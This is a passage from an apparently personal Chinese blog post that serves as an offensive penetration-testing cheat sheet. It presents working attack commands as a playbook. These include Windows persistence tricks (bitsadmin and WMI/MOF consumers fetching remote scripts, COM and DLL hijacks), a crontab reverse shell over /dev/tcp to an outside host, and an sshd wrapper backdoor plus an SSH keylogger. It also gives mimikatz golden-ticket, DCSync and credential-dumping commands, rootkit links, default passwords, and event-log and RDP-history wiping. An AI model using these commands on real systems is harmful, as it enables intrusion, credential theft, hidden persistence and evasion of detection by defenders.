<li><pre><code>HKEY_LOCAL_MACHINE\Software\Classes
HKEY_CLASSES_ROOT</code></pre></li>
</ul>
</li>
<li>11、bitsadmin<ul>
<li><pre><code>bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://host.com/calc.sct scrobj.dll"
bitsadmin /Resume backdoor</code></pre></li>
</ul>
</li>
<li>12、mof<ul>
<li><pre><code>pragma namespace(“\\.\root\subscription”)<br>instance of <strong>EventFilter as $EventFilter<br>{<br>EventNamespace = “Root\Cimv2”;<br>Name = “filtP1”;<br>Query = “Select * From </strong>InstanceModificationEvent “<br>“Where TargetInstance Isa \”Win32_LocalTime\” “<br>“And TargetInstance.Second = 1”;<br>QueryLanguage = “WQL”;<br>};<br>instance of ActiveScriptEventConsumer as $Consumer<br>{<br>Name = “consP1”;<br>ScriptingEngine = “JScript”;<br>ScriptText = “GetObject(\”script:<a href="https://host.com/test\&quot;)&quot;" target="_blank" rel="noopener">https://host.com/test\&quot;)&quot;</a>;<br>};<br>instance of __FilterToConsumerBinding<br>{<br>Consumer = $Consumer;<br>Filter = $EventFilter;<br>};</code></pre><ul>
<li>管理员执行：<br><code>mofcomp test.mof</code></li>
</ul>
</li>
</ul>
</li>
<li>13、wmi<ul>
<li>每隔60秒执行一次notepad.exe<pre><code>wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""</code></pre></li>
</ul>
</li>
<li>14、Userland Persistence With Scheduled Tasks<ul>
<li>劫持计划任务UserTask，在系统启动时加载dll<ul>
<li><pre><code>function Invoke-ScheduledTaskComHandlerUserTask
{
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,[Switch]
$Force
)
$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"
if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
New-Item $ScheduledTaskCommandPath -Force |
New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
}else{
Write-Verbose "Key already exists, consider using -Force"
exit
}
if (Test-Path $ScheduledTaskCommandPath) {
Write-Verbose "Created registry entries to hijack the UserTask"
}else{
Write-Warning "Failed to create registry key, exiting"
exit
} 
}
Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose</code></pre></li>
</ul>
</li>
</ul>
</li>
<li>15、Netsh<ul>
<li><code>netsh add helper c:\test\netshtest.dll</code><ul>
<li>dll编写<ul>
<li>后门触发：每次调用netsh</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>16、Shim<ul>
<li>常用方式：<br>InjectDll<br>RedirectShortcut<br>RedirectEXE</li>
</ul>
</li>
<li>17、DLL劫持<ul>
<li>通过Rattler自动枚举进程，检测是否存在可用dll劫持利用的进程<br>使用：Procmon半自动测试更精准，常规生成的dll会导致程序执行报错或中断，使用<br>AheadLib配合生成dll劫持利用源码不会影响程序执行<ul>
<li>工具：<a href="https://github.com/sensepost/rattler" target="_blank" rel="noopener">https://github.com/sensepost/rattler</a><br>工具：<a href="https://github.com/Yonsm/AheadLib" target="_blank" rel="noopener">https://github.com/Yonsm/AheadLib</a></li>
</ul>
</li>
</ul>
</li>
<li>18、DoubleAgent<ul>
<li>编写自定义Verifier provider DLL<br>通过Application Verifier进行安装<br>注入到目标进程执行payload<br>每当目标进程启动，均会执行payload，相当于一个自启动的方式<ul>
<li>POC : <a href="https://github.com/Cybellum/DoubleAgent" target="_blank" rel="noopener">https://github.com/Cybellum/DoubleAgent</a></li>
</ul>
</li>
</ul>
</li>
<li>19、waitfor.exe<ul>
<li>不支持自启动，但可远程主动激活，后台进程显示为waitfor.exe<ul>
<li>POC : <a href="https://github.com/3gstudent/Waitfor-Persistence" target="_blank" rel="noopener">https://github.com/3gstudent/Waitfor-Persistence</a></li>
</ul>
</li>
</ul>
</li>
<li>20、AppDomainManager<ul>
<li>针对.Net程序，通过修改AppDomainManager能够劫持.Net程序的启动过程。<br>如果劫持了系统常见.Net程序如powershell.exe的启动过程，向其添加payload，就能实现一种被动的后门触发机制</li>
</ul>
</li>
<li>21、Office<ul>
<li>劫持Office软件的特定功能<ul>
<li>通过dll劫持,在Office软件执行特定功能时触发后门</li>
</ul>
</li>
<li>Office加载项<ul>
<li>Word WLL<br>Excel XLL<br>Excel VBA add-ins<br>PowerPoint VBA add-ins<ul>
<li>POC：<a href="https://github.com/3gstudent/Office-Persistence" target="_blank" rel="noopener">https://github.com/3gstudent/Office-Persistence</a><ul>
<li>参考1 ：<a href="https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/" target="_blank" rel="noopener">https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/</a><br>参考2 ：<a href="https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/" target="_blank" rel="noopener">https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>利用VSTO实现的office后门</li>
</ul>
</li>
<li>22、CLR<ul>
<li>无需管理员权限的后门，并能够劫持所有.Net程序<ul>
<li>POC:<a href="https://github.com/3gstudent/CLR-Injection" target="_blank" rel="noopener">https://github.com/3gstudent/CLR-Injection</a></li>
</ul>
</li>
</ul>
</li>
<li>23、msdtc<ul>
<li>利用MSDTC服务加载dll，实现自启动，并绕过Autoruns对启动项的检测<ul>
<li>向 %windir%\system32\目录添加dll并重命名为oci.dll</li>
</ul>
</li>
</ul>
</li>
<li>24、Hijack CAccPropServicesClass and MMDeviceEnumerato<ul>
<li>利用COM组件，不需要重启系统，不需要管理员权限<br>通过修改注册表实现<ul>
<li>POC：<a href="https://github.com/3gstudent/COM-Object-hijacking" target="_blank" rel="noopener">https://github.com/3gstudent/COM-Object-hijacking</a></li>
</ul>
</li>
</ul>
</li>
<li>25、Hijack explorer.exe<ul>
<li>COM组件劫持，不需要重启系统，不需要管理员权限<br>通过修改注册表实现<ul>
<li><pre><code>HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}
HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}</code></pre></li>
</ul>
</li>
</ul>
</li>
<li>26、Windows FAX DLL Injection<ul>
<li>通过DLL劫持，劫持Explorer.exe对fxsst.dll的加载<br>Explorer.exe在启动时会加载c：\Windows\System32\fxsst.dll(服务默认开启，用于传真服务)<br>将payload.dll保存在c：\Windows\fxsst.dll，能够实现dll劫持，劫持Explorer.exe对fxsst.dll的加载</li>
</ul>
</li>
<li>27、特殊注册表键值<ul>
<li>在注册表启动项创建特殊名称的注册表键值，用户正常情况下无法读取(使用Win32 API)，但系统能够执行(使用Native API)<ul>
<li>《渗透技巧——“隐藏”注册表的创建》</li>
<li>《渗透技巧——“隐藏”注册表的更多测试》</li>
</ul>
</li>
</ul>
</li>
<li>28、快捷方式后门<ul>
<li>替换我的电脑快捷方式启动参数<ul>
<li>POC : <a href="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1" target="_blank" rel="noopener">https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1</a></li>
</ul>
</li>
</ul>
</li>
<li>29、Logon Scripts<ul>
<li><pre><code>New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null</code></pre></li>
</ul>
</li>
<li>30、Password Filter DLL</li>
<li>31、利用BHO实现IE浏览器劫持</li>
</ul>
</li>
<li>Linux<ul>
<li>crontab<ul>
<li>每60分钟反弹一次shell给dns.wuyun.org的53端口<ul>
<li><pre><code>#!bash
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1="">&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -</&9;exec></code></pre></li>
</ul>
</li>
</ul>
</li>
<li>硬链接sshd<ul>
<li><pre><code>#!bash<br>ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;</code></pre><ul>
<li>链接：ssh <a href="mailto:root@192.168.206.142" target="_blank" rel="noopener">root@192.168.206.142</a> -p 2333</li>
</ul>
</li>
</ul>
</li>
<li>SSH Server wrapper<ul>
<li><pre><code>#!bash<br>cd /usr/sbin<br>mv sshd ../bin<br>echo ‘#!/usr/bin/perl’ &gt;sshd<br>echo ‘exec “/bin/sh” if (getpeername(STDIN) =~ /^..4A/);’ &gt;&gt;sshd<br>echo ‘exec {“/usr/bin/sshd”} “/usr/sbin/sshd”,@ARGV,’ &gt;&gt;sshd<br>chmod u+x sshd<br>//不用重启也行<br>/etc/init.d/sshd restart</code></pre><ul>
<li>socat STDIO TCP4:192.168.206.142:22,sourceport=13377</li>
</ul>
</li>
</ul>
</li>
<li>SSH keylogger<ul>
<li>vim当前用户下的.bashrc文件,末尾添加</li>
</ul>
</li>
</ul>
</li>
</ul>
<pre><code>#!bash
    alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'</code></pre>
   * source .bashrc
   * Cymothoa_进程注入backdoor

<pre><code>./cymothoa -p 2270 -s 1 -y 7777
    nc -vv ip 7777</code></pre>

<ul>
<li>rookit<ul>
<li>openssh_rookit<ul>
<li><a href="http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz" target="_blank" rel="noopener">http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz</a><ul>
<li>Kbeast_rootkit</li>
<li><a href="http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz" target="_blank" rel="noopener">http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz</a></li>
<li>Mafix + Suterusu rookit</li>
<li>Tools：</li>
<li>Vegile</li>
<li>backdoor</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="web后门"><a href="#web后门" class="headerlink" title="web后门"></a>web后门</h3><ul>
<li>PHP Meterpreter后门</li>
<li>Aspx Meterpreter后门</li>
<li>weevely</li>
<li>webacoo</li>
</ul>
<h2 id="8、横向渗透"><a href="#8、横向渗透" class="headerlink" title="8、横向渗透"></a>8、横向渗透</h2><h3 id="工作组渗透"><a href="#工作组渗透" class="headerlink" title="工作组渗透"></a>工作组渗透</h3><ul>
<li>端口渗透<ul>
<li>端口扫描<ul>
<li>1.端口的指纹信息（版本信息）</li>
<li>2.端口所对应运行的服务</li>
<li>3.常见的默认端口号</li>
<li>4.尝试弱口令</li>
</ul>
</li>
<li>端口爆破<ul>
<li>hydra</li>
</ul>
</li>
<li>端口弱口令<ul>
<li>NTScan</li>
<li>Hscan</li>
<li>字写脚本</li>
</ul>
</li>
<li>端口溢出<ul>
<li>smb<ul>
<li>ms08067</li>
<li>ms17010</li>
<li>ms11058</li>
<li>…</li>
</ul>
</li>
<li>apache</li>
<li>ftp</li>
<li>…</li>
</ul>
</li>
<li>常见的默认端口<ul>
<li>1、web类(web漏洞/敏感目录)<ul>
<li>第三方通用组件漏洞: struts thinkphp jboss ganglia zabbix <pre><code>80 web 
80-89 web 
8000-9090 web</code></pre></li>
</ul>
</li>
<li>2、数据库类(扫描弱口令)<ul>
<li><pre><code>1433 MSSQL 
1521 Oracle 
3306 MySQL 
5432 PostgreSQL 
50000 DB2</code></pre></li>
</ul>
</li>
<li>3、特殊服务类(未授权/命令执行类/漏洞)<ul>
<li><pre><code>443 SSL心脏滴血 
445 ms08067/ms11058/ms17010等 
873 Rsync未授权 
5984 CouchDB http://xxx:5984/_utils/ 
6379 redis未授权 
7001,7002 WebLogic默认弱口令，反序列 
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 
11211 memcache未授权访问 
27017,27018 Mongodb未授权访问 
50000 SAP命令执行 
50070,50030 hadoop默认端口未授权访问 </code></pre></li>
</ul>
</li>
<li>4、常用端口类(扫描弱口令/端口爆破)<ul>
<li><pre><code>21 ftp 
22 SSH 
23 Telnet 
445 SMB弱口令扫描 
2601,2604 zebra路由，默认密码zebra 
3389 远程桌面 </code></pre></li>
</ul>
</li>
<li>5、端口合计所对应的服务：<ul>
<li><pre><code>21 ftp 
22 SSH 
23 Telnet 
25 SMTP 
53 DNS 
69 TFTP 
80 web 
80-89 web 
110 POP3 
135 RPC 
139 NETBIOS 
143 IMAP 
161 SNMP 
389 LDAP 
443 SSL心脏滴血以及一些web漏洞测试 
445 SMB 
512,513,514 Rexec 
873 Rsync未授权 
1025,111 NFS 
1080 socks 
1158 ORACLE EMCTL2601,2604 zebra路由，默认密码zebra案 
1433 MSSQL (暴力破解) 
1521 Oracle:(iSqlPlus Port:5560,7778) 
2082/2083 cpanel主机管理系统登陆 （国外用较多） 
2222 DA虚拟主机管理系统登陆 （国外用较多） 
2601,2604 zebra路由，默认密码zebra 
3128 squid代理默认端口，如果没设置口令很可能就直接漫游内网了 
3306 MySQL （暴力破解） 
3312/3311 kangle主机管理系统登陆 
3389 远程桌面 
3690 svn 
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网 
4848 GlassFish web中间件 弱口令:admin/adminadmin 
5432 PostgreSQL 
5900 vnc 
5984 CouchDB http://xxx:5984/_utils/ 
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网 
6379 redis未授权 
7001,7002 WebLogic默认弱口令，反序列 
7778 Kloxo主机控制面板登录 
8000-9090 都是一些常见的web端口，有些运维喜欢把管理后台开在这些非80的端口上 
8080 tomcat/WDCd/ 主机管理系统，默认弱口令 
8080,8089,9090 JBOSS 
8081 Symantec AV/Filter for MSE 
8083 Vestacp主机管理系统 （国外用较多） 
8649 ganglia 
8888 amh/LuManager 主机管理系统默认端口 
9000 fcgi fcig php执行 
9043 websphere[web中间件] 弱口令: admin/admin websphere/ websphere ststem/manager 
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 
10000 Virtualmin/Webmin 服务器虚拟主机管理系统 
11211 memcache未授权访问 
27017,27018 Mongodb未授权访问 
28017 mongodb统计页面 
50000 SAP命令执行 
50060 hadoop 
50070,50030 hadoop默认端口未授权访问</code></pre>

</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="域渗透"><a href="#域渗透" class="headerlink" title="域渗透"></a>域渗透</h3><ul>
<li>信息搜集<ul>
<li>powerview.ps1<ul>
<li><pre><code>Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer's domain
Get-NetCurrentUser - gets the current [domain\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Get-NetGUIDOUs - finds domain OUs linked to a specific GUID
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - get a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server</code></pre></li>
</ul>
</li>
</ul>
</li>
<li><p>获取域控的方法</p>
<ul>
<li>SYSVOL<ul>
<li>SYSVOL是指存储域公共文件服务器副本的共享文件夹，它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的，它用来存放GPO、Script等信息。同时，存放在Sysvol文件夹中的信息，会复制到域中所有DC上。<ul>
<li>寻找SYSVOL里的密码和攻击GPP（组策略偏好）</li>
<li>Windows Server 2008 R2之四管理Sysvol文件夹</li>
<li>SYSVOL中查找密码并利用组策略首选项</li>
<li>利用SYSVOL还原组策略中保存的密码</li>
</ul>
</li>
</ul>
</li>
<li>MS14-068 Kerberos<ul>
<li><code>python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机</code><br>利用mimikatz将工具得到的<a href="mailto:TGT_domainuser@SERVER.COM.ccache" target="_blank" rel="noopener">TGT_domainuser@SERVER.COM.ccache</a>写入内存，创建缓存证书：<br><pre><code>mimikatz.exe “kerberos::ptc c:<a href="mailto:TGT_darthsidious@pentest.com.ccache" target="_blank" rel="noopener">TGT_darthsidious@pentest.com.ccache</a>“ exit<br>net use k: \pentest.comc$</code></pre><ul>
<li>Kerberos的工具包PyKEK</li>
<li>深入解读MS14-068漏洞</li>
<li>Kerberos的安全漏洞</li>
</ul>
</li>
</ul>
</li>
<li>SPN扫描<ul>
<li>Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据，无需向目标系统发送任何数据包。<br>SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类，主机名和端口组成。在使用Kerberos身份验证的网络中，必须在内置计算机帐户（如NetworkService或LocalSystem）或用户帐户下为服务器注册SPN。对于内部帐户，SPN将自动进行注册。但是，如果在域用户帐户下运行服务，则必须为要使用的帐户的手动注册SPN。<br>SPN扫描的主要好处是，SPN扫描不需要连接到网络上的每个IP来检查服务端口，SPN通过LDAP查询向域控执行服务发现，SPN查询是Kerberos的票据行为一部分，因此比较难检测SPN扫描。<ul>
<li>参考<ul>
<li>非扫描式的SQL Server发现</li>
<li>SPN扫描</li>
<li>扫描SQLServer的脚本</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>Kerberos的黄金门票<ul>
<li>在域上抓取的哈希<br><code>lsadump::dcsync /domain:pentest.com /user:krbtgt</code><ul>
<li><pre><code>kerberos::purge<br>kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi<br>kerberos::ptt administrator.kiribi<br>kerberos::tgt<br>net use k: \pentest.comc$</code></pre><ul>
<li><a href="https://adsecurity.org/?p=1640" target="_blank" rel="noopener">https://adsecurity.org/?p=1640</a></li>
<li>域服务账号破解实践</li>
<li>Kerberos的认证原理</li>
<li>深刻理解windows安全认证机制ntlm＆Kerberos</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>Kerberos的银票务<ul>
<li>黄金票据和白银票据的一些区别：<br>Golden Ticket：伪造TGT，可以获取任何Kerberos服务权限<br>银票：伪造TGS，只能访问指定的服务<br>加密方式不同：<br>Golden Ticket由krbtgt的hash加密<br>Silver Ticket由服务账号（通常为计算机账户）Hash加密<br>认证流程不同：<br>金票在使用的过程需要同域控通信<br>银票在使用的过程不需要同域控通信<ul>
<li><pre><code>mimikatz.exe “kerberos::golden /domain:域 /sid:SID /target:域全称 /service:要访问的服务 /rc4:NTLM /user:silver /ptt”</code></pre><ul>
<li>攻击者如何使用Kerberos的银票来利用系统</li>
<li><a href="https://www.feiworks.com/wy/drops/域渗透--pass％第二十条％20Ticket.pdf" target="_blank" rel="noopener">https://www.feiworks.com/wy/drops/域渗透--pass％第二十条％20Ticket.pdf</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li>域服务账号破解<ul>
<li>与上面SPN扫描类似的原理<ul>
<li><a href="https://github.com/nidem/kerberoast" target="_blank" rel="noopener">https://github.com/nidem/kerberoast</a><ul>
<li>获取所有用作SPN的帐户<br>setspn -T PENTEST.com -Q </li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li><p>从Mimikatz的RAM中提取获得的门票<br>kerberos::list /export<br>用rgsrepcrack破解<br><pre><code>tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi</code></pre></p>
<ul>
<li>凭证盗窃<ul>
<li>从搜集的密码里面找管理员的密码</li>
</ul>
</li>
<li>地址解析协议<ul>
<li>实在搞不定再搞ARP</li>
</ul>
</li>
</ul>
</li>
<li>获取AD哈希<ul>
<li>使用VSS卷影副本</li>
<li>Ntdsutil中获取NTDS.DIT​​文件</li>
<li>PowerShell中提取NTDS.DIT<ul>
<li>Invoke-NinaCopy</li>
</ul>
</li>
<li>使用Mimikatz提取<ul>
<li>mimikatz lsadump::lsa /inject exit</li>
</ul>
</li>
<li>使用PowerShell Mimikatz</li>
<li>Mimikatz的DCSync<ul>
<li>使用Mimikatz的DCSync 远程转储Active Directory凭证<ul>
<li>提取 KRBTGT用户帐户的密码数据：Mimikatz “privilege::debug” “lsadump::dcsync /domain:rd.adsecurity.org /user：krbtgt”exit</li>
<li>管理员用户帐户提取密码数据：<pre><code>Mimikatz “privilege::debug” “lsadump::dcsync /domain:rd.adsecurity.org /user：Administrator” exit</code></pre></li>
</ul>
</li>
</ul>
</li>
<li>NTDS.dit中提取哈希<ul>
<li>使用esedbexport恢复以后使用ntdsxtract提取</li>
</ul>
</li>
</ul>
</li>
<li>AD持久化<ul>
<li>活动目录持久性技巧<ul>
<li><a href="https://adsecurity.org/?p=1929" target="_blank" rel="noopener">https://adsecurity.org/?p=1929</a></li>
<li>DS恢复模式密码维护</li>
<li>DSRM密码同步<ul>
<li>Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步，Windows Server 2003不支持DSRM密码同步。<br>KB961320<br><a href="https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni" target="_blank" rel="noopener">https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni</a><ul>
<li>巧用DSRM密码同步将域控权限持久化<br><a href="http://drops.xmd5.com/static/drops/tips-9297.html" target="_blank" rel="noopener">http://drops.xmd5.com/static/drops/tips-9297.html</a></li>
</ul>
</li>
</ul>
</li>
<li>DCshadow</li>
</ul>
</li>
<li>Security Support Provider<ul>
<li>简单的理解为SSP就是一个DLL，用来实现身份认证<ul>
<li>privilege::debug<br>misc::memssp<br>这样就不需要重启<br>c:/windows/system32可看到新生成的文件kiwissp.log</li>
</ul>
</li>
</ul>
</li>
<li>SID历史<ul>
<li>SID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>mimikatz “privilege::debug” “misc::addsid bobafett ADSAdministrator”</p>
<ul>
<li>AdminSDHolder＆SDProp<ul>
<li>利用AdminSDHolder＆SDProp（重新）获取域管理权限</li>
<li>组策略<ul>
<li><a href="https://adsecurity.org/?p=2716" target="_blank" rel="noopener">https://adsecurity.org/?p=2716</a></li>
<li>策略对象在持久化及横向渗透中的应用</li>
</ul>
</li>
<li>Hook PasswordChangeNotify<ul>
<li><a href="http://wooyun.jozxing.cc/static/drops/tips-13079.html" target="_blank" rel="noopener">http://wooyun.jozxing.cc/static/drops/tips-13079.html</a></li>
</ul>
</li>
</ul>
</li>
<li>TIPS<ul>
<li>《域渗透——Dump Clear-Text Password after KB2871997 installed》</li>
<li>《域渗透——Hook PasswordChangeNotify》<ul>
<li>可通过Hook PasswordChangeNotify实时记录域控管理员的新密码</li>
</ul>
</li>
<li>《域渗透——Local Administrator Password Solution》<ul>
<li>域渗透时要记得留意域内主机的本地管理员账号</li>
</ul>
</li>
<li>《域渗透——利用SYSVOL还原组策略中保存的密码》</li>
</ul>
</li>
<li>相关工具<ul>
<li>BloodHound</li>
<li>CrackMapExec</li>
<li>DeathStar<ul>
<li>利用过程：<a href="http://www.freebuf.com/sectool/160884.html" target="_blank" rel="noopener">http://www.freebuf.com/sectool/160884.html</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="在远程系统上执行程序"><a href="#在远程系统上执行程序" class="headerlink" title="在远程系统上执行程序"></a>在远程系统上执行程序</h3><ul>
<li>At</li>
<li>Psexec</li>
<li>WMIC</li>
<li>Wmiexec</li>
<li>Smbexec</li>
<li>Powershell remoting</li>
<li>DCOM</li>
</ul>
<h3 id="IOT相关"><a href="#IOT相关" class="headerlink" title="IOT相关"></a>IOT相关</h3><ul>
<li>1、路由器<ul>
<li>routersploit</li>
</ul>
</li>
<li>2、打印机<ul>
<li>PRET</li>
</ul>
</li>
<li>3、IOT exp</li>
<li>4、相关工具<ul>
<li>OWASP-Nettacker</li>
<li>isf</li>
<li>icsmaster]</li>
</ul>
</li>
</ul>
<h3 id="中间人"><a href="#中间人" class="headerlink" title="中间人"></a>中间人</h3><ul>
<li>Cain</li>
<li>Ettercap</li>
<li>Responder</li>
<li>MITMf</li>
<li>Bettercap-ng</li>
</ul>
<h3 id="规避杀软及检测"><a href="#规避杀软及检测" class="headerlink" title="规避杀软及检测"></a>规避杀软及检测</h3><ul>
<li>Bypass Applocker<ul>
<li>UltimateAppLockerByPassList</li>
</ul>
</li>
<li>bypassAV<ul>
<li>Empire</li>
<li>PEspin</li>
<li>Shellter</li>
<li>Ebowla</li>
<li>Veil</li>
<li>PowerShell</li>
<li>Python</li>
<li>代码注入技术Process Doppelgänging</li>
</ul>
</li>
</ul>
<h2 id="9、痕迹清理"><a href="#9、痕迹清理" class="headerlink" title="9、痕迹清理"></a>9、痕迹清理</h2><h3 id="Windows日志清除"><a href="#Windows日志清除" class="headerlink" title="Windows日志清除"></a>Windows日志清除</h3><ul>
<li>获取日志分类列表：</li>
</ul>
<p>wevtutil el &gt;1.txt<br>获取单个日志类别的统计信息：</p>
<p>eg.<br><code>wevtutil gli “windows powershell”</code></p>
<p>回显：</p>
<pre><code>creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
</code></pre>
查看指定日志的具体内容：

wevtutil qe /f:text "windows powershell"
删除单个日志类别的所有信息：

wevtutil cl "windows powershell"

### 破坏Windows日志记录功能
* 利用工具
    * Invoke-Phant0m
    * Windwos-EventLog-Bypass

### msf
* run clearlogs
* clearev

### 3389登陆记录清除
* <pre><code>@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit</code></pre>


      
    </div>
    <footer class="article-footer">
      <a data-url="https://rich4rd0d4y.github.io/2018/09/07/2018-09-06-内网渗透/" data-id="cjsbgjm9z0006iuph2t96sqg4" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/内网渗透/">内网渗透</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/01/10/about-me/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          about me
        
      </div>
    </a>
  
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/内网渗透/">内网渗透</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/about-me/">about me</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web漏洞——文件上传/">web漏洞——文件上传</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/内网渗透/">内网渗透</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/about-me/" style="font-size: 10px;">about me</a> <a href="/tags/web漏洞——文件上传/" style="font-size: 10px;">web漏洞——文件上传</a> <a href="/tags/内网渗透/" style="font-size: 10px;">内网渗透</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/01/">January 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/09/">September 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
